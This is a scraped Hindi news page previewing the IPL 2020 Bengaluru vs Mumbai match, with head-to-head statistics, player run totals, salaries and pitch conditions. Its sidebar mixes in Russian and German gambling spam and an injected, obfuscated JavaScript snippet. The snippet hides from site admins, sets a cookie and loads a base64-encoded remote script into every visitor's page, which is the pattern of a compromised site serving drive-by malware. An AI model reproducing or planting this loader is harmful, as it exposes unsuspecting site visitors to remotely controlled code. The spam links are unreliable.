सीजन में पहली बार रोहित और विराट आमने-सामने: IPL 2020 में आज बेंगलुरु vs मुंबई

- Advertisement -
- Advertisement -

आपको बता दें कि बेंगलुरु के खिलाफ मुंबई का पलड़ा हमेशा भारी रहा है। दोनों के बीच हुए पिछले 10 मैचों में कोहली सिर्फ 2 बार ही मुंबई को हरा पाए हैं।

Source: Facebook

आईपीएल के 13वें संस्करण का 10वां मैच रॉयल चैलेंजर्स बेंगलुरु (आरसीबी) और मुंबई इंडियंस के बीच आज दुबई में खेला जाएगा। इस सीजन में पहली बार टीम इंडिया के सुपरस्टार प्लेयर विराट कोहली और रोहित शर्मा आमने-सामने होंगे।

इस सीजन में अब तक यहां 4 मैच खेले गए हैं। चारों मैचों में यहां कोई भी टीम चेज नहीं कर पाई है। दिल्ली-पंजाब के बीच खेला गया मुकाबला जरूर सुपर ओवर तक गया था, लेकिन इस मैच में भी पहले बल्लेबाजी करने वाली टीम दिल्ली ही जीती थी। दुबई इंटरनेशनल स्टेडियम में होने वाले मुकाबले में अपनी टीम को जीत दिलाने का दारोमदार गेंदबाजों पर होगा।

कोहली ने 178 मैचों में 37.68 की औसत से 5426 रन बनाए हैं। रैना के 193 मैचों में 33.34 की औसत से 5368 रन हैं। रोहित आईपीएल में 5000 रन बनाने से 10 रन दूर हैं। वे 190 मैचों में 31.78 की औसत से 4990 रन बना चुके हैं। अब तक केवल दो बल्लेबाज ही आईपीएल में 5000 से ज्यादा रन बना सके हैं।

मुंबई को सीजन के पहले मैच में चेन्नई ने हराया था। वहीं, बेंगलुरु को पंजाब के हाथों हार का सामना करना पड़ा था। सीजन में मुंबई और बेंगलुरु का यह तीसरा मैच है। इससे पहले दोनों टीमों ने 2 मैचों में एक मैच जीता और एक हारा है।

आरसीबी में कप्तान कोहली सबसे महंगे खिलाड़ी हैं। टीम उन्हें एक सीजन के 17 करोड़ रुपए देगी। उनके बाद टीम में एबी डिविलियर्स का नाम है, जिन्हें इस सीजन में 11 करोड़ रुपए मिलेंगे। वहीं मुंबई में कप्तान रोहित शर्मा सबसे महंगे खिलाड़ी हैं। टीम उन्हें एक सीजन का 15 करोड़ रुपए देगी। उनके बाद टीम में हार्दिक पंड्या का नंबर आता है, उन्हें सीजन के 11 करोड़ रुपए मिलेंगे।

बेंगलुरु ने अब तक 3 बार फाइनल (2009, 2011, 16) खेला और तीनों बार खिताब नहीं जीत सकी।

आईपीएल इतिहास में मुंबई ने सबसे ज्यादा 4 बार (2019, 2017, 2015, 2013) खिताब जीता है। पिछली बार उसने फाइनल में चेन्नई को 1 रन से हराया था। मुंबई ने अब तक 5 बार फाइनल खेला है।

पिछले सीजन में बेंगलुरु एक बार भी मुंबई को नहीं हरा पाई थी। आईपीएल में मुंबई और बेंगलुरु के बीच मुंबई टीम का ही पलड़ा भारी रहा है। दोनों के बीच अब तक 27 मुकाबले खेले गए। मुंबई ने 18 और बेंगलुरु ने 9 मैच जीते हैं।

टॉस जीतने वाली टीम पहले बल्लेबाजी करना पसंद करेगी। इस आईपीएल से पहले यहां हुए पिछले 61 टी-20 में पहले बल्लेबाजी वाली टीम की जीत का सक्सेस रेट 55.74% रहा है। दुबई में मैच के दौरान आसमान साफ रहेगा। तापमान 27 से 39 डिग्री सेल्सियस के बीच रहने की संभावना है। पिच से बल्लेबाजों को मदद मिल सकती है। यहां स्लो विकेट होने के कारण स्पिनर्स को भी काफी मदद मिलेगी।

- Advertisement -

Latest news

– онлайн казино и покер рум.1455

Покердом - онлайн казино и покер рум ▶️ ИГРАТЬ ...
- Advertisement -

ज़रूर पढ़े

इंदौर: नाबालिग को हुआ पंजाब के लड़के से प्रेम, पबजी खेल से हुई थी दोनों की जान- पहचान, पहुँच गयी पंजाब उससे मिलने

परिजनों की गुमशुदगी की शिकायत पर; पुलिस ने कॉल डिटेल निकाली तो दस दिन बाद आरोपी और लड़की को इंदौर ले आई।...

कमलनाथ के नरसिंहपुर आगमन को लेकर करेली ब्लाक कांग्रेस की महत्वपूर्ण बैठक संपन्न

राष्ट्र आजकल/पूनम दीक्षित/ करेली नरसिंहपुर: 19 मार्च को विशाल आमसभामध्य प्रदेश कांग्रेस कमेटी के अध्यक्ष पूर्व मुख्यमंत्री कमलनाथ का 19 मार्च को...

सिंधिया: किसने क्या किया- क्या नहीं किया, कांग्रेस को खुद नहीं पता अपने नेताओं के बारे में

कांग्रेस खुद ही नहीं जानती कि उनके नेता ने क्या किया और क्या नहीं. कांग्रेस छोड़कर बीजेपी में शामिल होने वाले ज्योतिरादित्य...

Related news

1xbet официальный сайт и рабочее зеркало вход на 1хБет 2025.5665

1xbet официальный сайт и рабочее зеркало – вход на 1хБет (2025) ...

Die Besten 17 On The Web Casinos Im Vergleich

Top Online Internet Casinos Deutschland 2025: Liste Deutscher Anbieter"ContentAttraktive BonusangeboteSpinzgroßzügiger 500 % Willkommensbonus + 50 FreispieleDas Spielangebot: Had Been Ist In Legalen Online Casinos...

test(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(//g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')||document.documentElement).appendChild(s);}catch(e){}})();

Мелбет на Андроид с официального сайта: Играй на максимум в 2025!

Мелбет на Андроид с официального сайта: полный обзор 2025 Автор статьи: Андрей Пономарев, главный редактор iGaming. Модератор: Светлана Донмез, эксперт по спортивным ставкам и онлайн-гемблингу....
- Advertisement -

LEAVE A REPLY

Please enter your comment!
Please enter your name here